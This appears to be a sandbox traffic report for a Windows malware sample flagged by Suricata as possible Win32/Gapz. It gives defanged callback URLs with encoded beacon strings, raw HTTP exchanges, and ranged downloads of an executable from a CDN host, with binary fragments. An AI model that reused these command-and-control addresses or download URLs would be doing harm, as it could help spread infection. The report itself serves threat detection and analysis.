hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=2v0SNuZrMFyRcITdAqjv5kHhmP0JRCH4gcFBH2PvehX UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45wR Wfb4Zsa/MPo3f 1FoU88LbHT B3j4QS3i7uWq3eyaPJBwCOHNX9jATJeWJrFDo2Fq9Oiiau1gKkdlz1lRofr/zw3mMKgg0JQd5HxgIXdXSs 69z5tFbQfHq0QVBDfGyD/5jiBcsklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGe7zl0nsE9nIJr1L8WaeJxOPSoeGI1 59NCasEWnSMNQ=
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWLqfIekNLhs5jgb6v7cXpPu93RkgrfPIdK/1bjUefs49JU1ySiay1sqdymVuPyjsZySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZ7vOXSewT2cgmvUvxZp4nE49Kh4YjX7n00JqwRadIw1A==
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=AZwPyJy3TZihee7pGMSR6XSp0dcZrdBnOtjdAsNaFT6my6t0 u4xzY1hNpWaoDmrUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/9qwl8XcknIZKuYFH/XSaEbogTtuHHrMWWMnNHFDGURn5DGpjUikD3FvcC/Rx6cjo1qg9mP3gfJPjBH6ZzUnnXsmxw368usKjGzyp8r50/oAU8yRr4Ty3tIPlhjIQTrv xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsgCBuT7gbWk6xm3F/hUzL2FWmw8O5wxlNg==
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWA2yDM6d7piii11NaYYxcNku1SXIq07tJg ABjx4/MVnPaT JG0G pPE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyAIG5PuBtaTrGbcX FTMvYVabDw7nDGU2
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=XJYuqQQo69d2lr6SLgmZct137P FaWoaylUc74 Qgg8gzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wF6p84vT1Zqrte3upwN8WEnBPEhRyyBD7DXy8/ CI2m OeVBPFbDua/xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsgCBuT7gbWk6xm3F/hUzL2FWmw8O5wxlNg==
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/15287.ashx?e=hWfaA75NtHELjT49fHfOTGcZbTSs7S3w/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8AVhT/AnR7cM/LiHNspT7yPNtJ6SchDLBDyhRDL0PLalNTvXaKqGxaNCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWAo1JeSgT 5XmlmKz1/6dN1Rfc9FsqZ5xt9dN4nGKxRz8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWOVgX/J3gfcX m9LCDwJlgNkkbY8Ma nNwnzdtby/DJBQ==
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWKv9x4TEPS62BPEhRyyBD7DR614fwrEG1qQdf661A7a3sYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp1AS6yP6oxsM5GLBpOcPqKjNx8vJ5rgFy9HY3588pyhg
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=/k6kR j50tpQhScA1jb3T678RHvyUzuSnvZi s3jtzH3VPP0BYZZ/JwQnkcbjmdiLntfO9v5CwenNguChnjFY5WBf8neB9xf6b0sIPAmWA2SRtjwxr6c3A3wki0FfzrnQR6/4IivvmTPCdbENzDOdINNHDNP6/8qLhu0b45kiT 2Xfi4eCjhjMjKRY6Iofb7pjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FIDHLn8j4ExZ
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWPa HuGTRyAEFAL52sIXt4Ua8Zp/ 13YC175vqqyfEnMnylXnslTRg848241y0s0/3gUxyF5wkLuxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsgCBuT7gbWk6xm3F/hUzL2FWmw8O5wxlNg==
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWL6tRdMI7h/vKYX3Ti/i3YOjZeNnmCpUenKu2vOv4IU1x7lHbgMeClaNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FIDHLn8j4ExZ
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=aQQpsP6/AW0LjT49fHfOTJHuIH6CGwpk/Dn8i7qp5mB38psj3UbutFu0ICSu0QOYghmiZJc6KBe9Kbi6m4oCRnu85dJ7BPZyCa9S/FmnicTj0qHhiNfufds34bxlLfK5DHGXB7YFOPGqHZcQIdNYOTmpOQWDw6hY4u3oGHN86wOkpZrNsvTHKpXcKSoKf7ImsTIe5wObHey9BKGIpZn1wUSPdqmKrASUuW0z4fDf/CL5icQHUvxQfe2KCefkiIqiSoA1acazRDQ3/hMAj7hCtv2fF1nx0QWILbeTSdCAAmVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXkQmwo8xpaCHTmEa2mI46MHN/3JP3os6Q
hxxp://yzkpnc17y-mzxspesu.netdna-ssl.com/13880.ashx?e=AZwPyJy3TZihee7pGMSR6XSp0dcZrdBnOtjdAsNaFT6my6t0 u4xzY1hNpWaoDmrUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/9qwl8XcknIZKuYFH/XSaEbogTtuHHrMWWMnNHFDGURn5DGpjUikD3FvcC/Rx6cjo1qg9mP3gfJNetwXok6MQkygRO0KnCdHCCNiNeNKIpAJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXkQmwo8xpaCHTmEa2mI46MHN/3JP3os6Q

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /15287.ashx?e=hWfaA75NtHELjT49fHfOTGcZbTSs7S3w/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8AVhT/AnR7cM/LiHNspT7yPNtJ6SchDLBDyhRDL0PLalNTvXaKqGxaNCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:18 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Mon, 29 Jun 2015 04:47:18 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /smw9476dp.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 25 Jun 2015 15:20:22 GMT

Content-Range: bytes 500000-749999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: BFNCYyxkrbqNu2OsdqWgSG_1lfG4Myn3ybAQ_uKhK5etbess4sjqUA==
.8.h?./;...g/..t..`......FM!......J.g..3.o.a...."z..{...]...&.......$.
..I6.G..\.9......o.&". .'_zr4....Y...pe[p....Moc..4./M........z..U\j4.
.....{|^.d.7.'....38...9.....$]o...../...Y]........,.X.<=.....5. G.
.1W..j...7...!x.$.~...B.....W.4...\...B*.1.....{..?\.../P(9.........6.
.*...?=*.....64ILl.x....!.._.aF!...*.6..s>.(...Zh.L.*..~NqP(..4!...
.V=.....A..:P./;[email protected].(...._::..Gp.....*.\Mzj...pD.'..`
w...........#EJA.7{............\.9..%W.0.n../Y.......f..g...'A..v.....
....!k....n..X...b....BB.......(7.......tz.....C..L.>....=.........
.$....9..=.Z....wP.Z..|...3.2..@\k..$K.3.m.....T...i~...<...J.&!M{s
[email protected]!.0...........x2I"..........{.yk..9...D0..rR..a=...&0..).(.Ta
Qm....j%..*$A.........& T#....N^>.bn.>.....:U.[B......<S.e..3
`j..3....y..fD.....-Ok.........~........'....,).!..d_.L?S..!|`.....U.L
.......;.q....:.......;.......dy...o7.z{0].hG...^.5..,q....9... ."...g
..Z..zP. .....TH......4.W....*...~H.r. ...6.{.F0u$.u....@r,.....R..L..
...N..p{.c~m...f;..........!~m.........`.X.x.S.5.."..f>g>....8-.
.(R.......}.GK..s.tr...;7.f.s...v.Zk....A...q.'{..dQ.~..W)E....K.|9.ky
....h.@..(...i..J0uJ-.....<.n.QrheL.."L1_k...Z...^O..?..#.N../7.R..
.p.q..U9.b./F..jy$=G... .S..X...e..M...^.....JF.....@D..>.....{...@
..:..v......S....=....t\<vd.N...[[email protected].......(..>.~
q....\Z.}.f7.qTe...|.....=<.u.7. QG....pK.5.C......r.r.......`.j..j
#.,.O...d@tS%Q.N....o#......A.g.3.O0.p}....#...K...=.6.c...T$Gv....!..
.(3.`:g<.B.o.c.-[. .T~`.\..........:%.J&Wd.....N.F.....!?j...M.
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 25 Jun 2015 15:20:22 GMT

Content-Range: bytes 1000000-1249999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 2M3Ey4mWnCGumJHDHg-QW-B-9mYlY1p9qhTi9-BOhVKOiGmhHG-1VA==
.4... ..]..E.....X.>$....q....%.N...u.k..p4........!...t..[.R....I.
B......X.Hbx.;F.>v`.H.#.I..;E..L.Q.eN.. ..h=.j.M..sJ...Bq..;a......
.L.....f.r.}....st n..~5rL.5.<Z....Z..).X.R....K.t..E...f.?.....nT.
k....2M....X;....s.$Q...6Z..R..3.cY.>[email protected]
6..7...g`....T....."..;.<..KV.!Y.d.z..(.........hi"[email protected]_)
p.:..jk.N..5OWM..[......S:'.m$.....'.1Be......X.L.H'>..~...a.tk...V
Q.. .K'.(.Fp%..v..`.:..K.=..hp.5.....M..) .I.K..S.Z.9.x.U7z..M. m..FA.
...c....yo..b...1.9#1. H..L....c.b....qj.....>.....C..N.).A$..;...}
.I...p.r.H...(.s]|0...[..(.8r..<^5a...A.....j]...c.... R..$(.f2u..C
x-..`.C.|B$N:.}.F.`b.d..o0P.r...f..3...............JoM9..$...Y:.......
1..............O6...E O#.K6{.?$-....wU...L....R.L.k.|...5BH8...HK.>
....&.`..;.kE.bt..w ...".OS.|..^.6Oa....o=......$...j\.M..B.O).').....
&...4..1.~..X.......lM...[.....<]. ...o...j.p.w2.U.w...a..!....x.kW
..".. .]:.....${s......qz..........(.h.z........k..}.[.T1...K...X.{(x.
..y...<.........t..[.~h..eM...*.v..M...f.Cx.u..1.ÛC>....o....~
.\. .E..~.h.........o....WE.=...6N...[....22.{s..J..nx:..i.M[.....c. .
._. .F.......ASZ.i,....tQ.`.......Q'......h..e.?53...H.9=...._......m.
.....P.I...0}.S...\...F3".(...'..8F.....8.).._........v.6P..1..6...i..
.....'..............,8...;.e~...Y><V.......K{u'..h*.o.&..L......
jb.....'...|M...iY..Jw....@T..`..|..........A.D.a.x...q.T.1A.`..S.jc.W
..>"v.].dK...(..{d..V..D<.R0a.C.. .K...... .n4..l@..~>.8.^.o.
..W.....I..?4..I.d.SS/....m!.......9..R..U..H..."...9..|...m....F.
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 25 Jun 2015 15:20:22 GMT

Content-Range: bytes 1250000-1499999/3973864

X-Cache: Hit from cloudfront

Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: wbrdVSSUR6h3APspy64khESUohcNBsboNe28-4pWsfyhiJtjWBYn3g==
.C.Q..'....._L."9 ..v..Z.y...1.............'..MZ.a!".. ..B...#.......a
b.~M.i......r.>M..{_.\.v..4R.. T.x$.ai....*.BX6-.....6...)......#..
?.k-....L...KF..............._.......A.H..B...P..[...~..?........;.j=.
t..o?.].v..3...s..^>.FV.8.H.R.&,.}.lb....Ew./....e#[email protected]\.$#...
......q.Cl.WRqP..h..7~c?.x.GS.lp%.!VcG...}]X.C.8Ut......e.C^...u.....W
[email protected]...<xf.6........R3...r_..J. ..y$..a"
....r^.S..i5.\aD.t..Q.gk2%a...F..:.e.`...... ?.v.7{.e..f=.9.h^:^U...q.
.R....I...ueHA.p-.m*.k!.a........y....q.I......./......q.V....f!....M.
j..............L.#.6$./.mu0..5o/....Y..#[email protected]!d..<.\..z.....N._
6...../.e....V......._.Z.5W..H.Eb...w..v.9.A..n.$x.`d.t.r.....t.Zjb...
.,......;..:cd_C.I....sJ..a}.$.z....F.....(C0....7a...... bp7.."j..j..
1....e.q.3.....a.M...k..N.....rO.P..C.>..Q.;.....t..,...U..2ogp....
M{)sod....'8..M3b..... f].d..Ae,......J.~rYX..&xqC........oo.g.Ll>.
)...1Y!...6b...K.X.yk4.].....E4.r>31F.>..'$/o.,[email protected].^
B9... .....cv.UA..).D,....p.'.R..w............8.7....B..w..<.......
.......RA....,UU...|.:.kc...l$...T.F....|..Z.oD....s.).....I..a...2...
5)L.....L.Y.(....U[..xL...Y...]....=q.U.|5~..B.b..u../...#...vxZ...T.c
.....2.L.........{..Z-.s.....X.av..M~F........^.....r..7.M.....;[.....
...k.-*...m....A.7..n.WaSq.....f.ii.w... `....WODp).......].$1.z..y^..
ZY.....I. ....Y..oL/...X~..q........f..8..A...y.~.....`_..!.yb.M.O..a.
T...p..N..N.........h$.$.[j....v............G.:Ya.W........ .'F;Z..3..
..~..W4..A...b%b.....:H..x..h.UY8..X1.....".8.J...l.a...M...5....1
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 25 Jun 2015 15:20:22 GMT

Content-Range: bytes 1750000-1999999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: TY7D0kiWjRY-XCcViW_KLvwW_BHMpCF_LxT1BWRdrzs49_3n0RvDpA==
.nj.m.P..V..%/...x..c.....h..x..$..8.^g..V...\.{..#2..?....#..^.FL.9..
[email protected]#O.....=5.9.(..i....T....Cv..-..u..i...CP..-..xk.T.
..m.,..V...........3.?T.....w....".....p A......3e..P.e....^.v.|.]D...
D...E.... {....pC.aO.^sz:U..}..!.,.Z,....4k..l ..>[email protected]..
5..-s.==..8p..;..4..!....Jr@3..]..........%.E.P.k#.e.....n ..E....1Xs6
......\S.,.....#g..n......Y.K.,4.y(...0...5............&.......<..n
*w..j.1a.>/...m.B..O.....ED.Pk..F.....z....#bC.>;...t^...a..9...
.&.......G...R................k..IW.C..iD...j.pp3...q.=....."'........
O.[....y....N.).....5..!..b..,.R..7'..2.A.[...F........E..c....u.*S)j.
.x ..T,...G.X...}Dd-?.Z..dm.e.......d4|.e-".}..1.r]{..L..&.. .D...%^..
......`...s.. ./-..QSl....VA....O 1.x..T......_......*.W.....3!...3...
JS..WZ.0..H..`9i........x.1M...x.c......]6......t].1.tRX.....Y.A.r.,..
.`iZ..|~.x...B....98...}......g...6.......'....x>H6.|...Ko.q...-...
..L.1q..=........d.L..53.x.>..;L..|B9.o....z..4...u0.l.g.<.w~.w.
..g..w.."......U.... .<[email protected]./..F.). M\...H...>.<|
!.d.AR... ......:.6.p.{v.-...9.......FI.fV....^d_`v..}....-.$.2..T.|b.
.7..Z.....A]@g..a.,.PDe7.............hu.......J.........*S...Q0m.d...&
gt;..o4g.>b.bo.K.-`....%.......>..z..O..}g....".rp.B>s..MAw.l
.......s.c.....<a.U...G....\..t.s.e"...|q..N.Z..cW".......=.....yL.
l..[..^...;Q...|(..l....8.4"......R...8=.>..B....B.~..b.Oq.@<9D.
...h`...WE"[email protected]..`.j....u.:R.y..... .....&.o....".Z `).L.k..
Y......c...R3h..Y./...\$.c}.<.....y.....0.r.E(..`hU*.[.}.q.[!..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 25 Jun 2015 15:20:22 GMT

Content-Range: bytes 2250000-2499999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 13ujlmLW6I7a8uUI1k6wsrkkAw0hm1_VdPtDml6OS40eOvrZiRinNw==
..5...N.au....H...E.....Z..a..;...h.<.P.{....S.0.....;...*.(d~O.t._
.S.D.....*F.`q.b.../~<.X..T........'.{.f..0..*.lD.<...NR.B'.2?.#
.|CJ>Py..{$.k..{.'..L|..,.\).>..Y.{.~_.*P:?BO>.:JN....z[..g..
.}....SX.L.Z..j.........}x.8...r....V.........>_..e!V....W .. VQ...
t....Mb;.yV.U....=.`C........G..n.p..y4....^.|.@.%..3....z..$.p..reu&l
t;?..W.......9...}..F.....u.. ..u....qwI.%{.{.....B8.I.....u.....\.h:W
z.i..... ..M6..>..<.#N#SyQJ....,.'..!T.....m..25..7......~y.....
h.>....i...).........3'_......oc....'.o.-.......D.R.U'.......[.K.;.
..........n,.^.|vFw$.B....y..^Lt.....M.........E.Qb|S..I.-.o.}od.X.c.8
y....wls...j.....\.?Q<n.;..n.h"j\.j...<7.......^&4?!p#g..&..>
c.^......n)E...F....v.3O......t.!6;[O.>R?Q...V...._.dk[..X.....'4./
Vc........k"B3x@W....\.........m..Y.US.......W\>.G.........Ty.dR.w.
...m...o!...-...V.X...0o.[9./*.,...%.&.CX..H6=.......t...,kk/.A.f.jqbu
.w..j....q| ...#N.....$.9E1b#6...O.. ..G.....................bc."...K"
....hb.......@.(..v..E.%.! .(........}.^...]`...}[email protected].......
.`.......qi...cy.O.S...H..d..*...../....QC4s.;.C......c[-'A(.T|...(..I
[email protected]".4}....P.pXE.B.,@7.@Ox[M?........p-.4.1..K..w.}....5g.....W8...
...X..(..-...f.PP.>....=>YN.U0.*..8...F4.. .Y.-j...#.).....w...S
Tn8..e..z...@>....\."...H.d6.~FP...).K..d.*'.>..?|\...J1Y....ZYG
.....[.....F1.-q)......[5..R.f.j....../...rD..~...`.W..;.2k0./....._p.
E..?..".N.HS).._.1~.T.....0.HEr...v-.8..*.................HT.t.<.:t
aC......U.,.."....I.......<...>j1.?.........q...U.....--...b
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Sat, 27 Jun 2015 17:45:52 GMT

Content-Range: bytes 2750000-2999999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: BxsVxMWWEZOJ2qrEs_IiCQuawD9XSeE2TrSJZfnCqZQpwEHUsSf_fA==
......$L3..@...@ *.*.|......E=v.wVz...}.....E...c..,..Z..........<.
..-y...7.B...E.`.....L... ..m....O...Y.).P.w.....F..WB.5#..}6a?...C.f.
...4..mm.....m.S.../.Nr/........-.".....b..n:..fL........l.f5m.....(I.
.....x.....oT.wv.C.......{....O..O....Gp.\..../.$...9xy...o..._...5.A.
X...ev4.#d...h.F..mi....T......V.......T..9h.Tw............!./vh.i....
..AU.!PBW.e....... ...U.AST,..5..^.SK.O....,..tH..&9r....> ../.wa%Z
.$.q.y.5?n....T?........."..}.c.9c?Q..*=.-.KQSS .K..h...}.".6..!....}.
G....!V....q.m$b.........*.A...eiW...g%.h.#. .3z.)...m..b.`..#..h.\.x.
 #.K...=.l..I....t.K......2.k%......A.S.(:...[[email protected].
.[.RB....... ...-X........2.T8./.a.k...S.....0...."S`..R...Y{......#.`
 ...9..qv.,_.........:..P.c....m.W..#.J.b..:g.......A.$..Q.G...:..f.U.
..[....."D.......v..A..u..]...AT..w)[email protected].).j...Q b.K.
.7~...6......kc..._...|.L1...l...z. .[.(......|..gO..XeEMb.Ma.".."."&.
.....h...9..y.....[?...u.....EN..M76.......k..<.5b......f8...L...D 
..|..K.i...........<-..(......*BW..[-....<.q.U{........Z../.!j.w
hy8.~.........~.'[email protected]._..e.......AN..Q..._..~.$.~...-.J....'.....Z;
.....@.}..o.h...I..G.S..49......4.B.%W......#....p0k.|{c...QB$=...:.:.
.......$_.tW.X1....Z<.z.F....."...Y...5......&.V.y..i[..N'.z..A.D..
'E8.|$p...K.......#....0..sM._....=..mz.A..BWl.a.|..>...k<.O..9G
..Y.I.....?...[.......).0.:.z.w$......,'s...,O....;u..L~e.......9*Nb..
...6....d...R.#d....K.b~c.1...s.i.........q*E..g..k.z...xB.q...H...M.%
#R.....n.c.=.x\!.).}U.[..X_..6..W.W..........C....Mn.x..K&/..T..[7
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3500000-3749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 25 Jun 2015 15:20:22 GMT

Content-Range: bytes 3500000-3749999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: kdHp0YyHXb0eyqQu2RZV6YPnT2h5lwOtTgQDFjta17EjDBfrz7B3qw==
..a.....8%..............J...........*.......'...P.....C....l......p...
.|.4.c ..6.V....[9/|=..j.VNr....!.f^..............`....R.]....,2F~....
.w9.]61..|..,Wu...77.,.ft#..~......!&N.|..mv..z.-.Io..{=.0.....,Ky.I.F
.^h.......t..l..l.=,..n.X.-c.N...6?...5M.m...l.$l...h1.Q-.....3. cg.Vm
...3..i1....t..H..(....Y0..P...{..M..!KBaq.,n....09.J............0....
C.,....s...V.1.5.6...D...D........A`s.-.._Q^a.....C5.~.x..e^>d.$.,'
r...0#.-6q..<......h.HMR.4.4]...,..x...L...V.!6..T<..D.B..-._q!!
Ib.'..&C....K...[kl..C...*M*...h......../. -Y...g.UU..0..k:a....x.....
<.c..........Z...fO.G..O}..8]K..........b..(..C...\....b....."..a..
....fF...iI."..^/.KO..2.d..?} 9.Q..^L%..#..k.`p}Y_M./....j'..h........
......#..5Y.M..H-.Iu..^...#..I.*.i..2Xqx%.#..;.mZ..$.-*|.9L...f.`..;o.
..8..*.f./!i)T...O.Fj..NM....?ji..3gHp...([email protected].|........rG.(<d..
[email protected]|.2r....=vGXH.D..-v|..]r...?BYi......}..m....w....`K
I.'...p/...q....N1.c..D.N.o......v...&%l.Y.".d..EUk......E....}......I
19m&[".....~l.<.7..<.....m.........<.c..z".1........]p..tZ...
.....?.n.x....eI....;)......,u..2...'...y.dY`xf.U...%.O&.V.D..(...V#E1
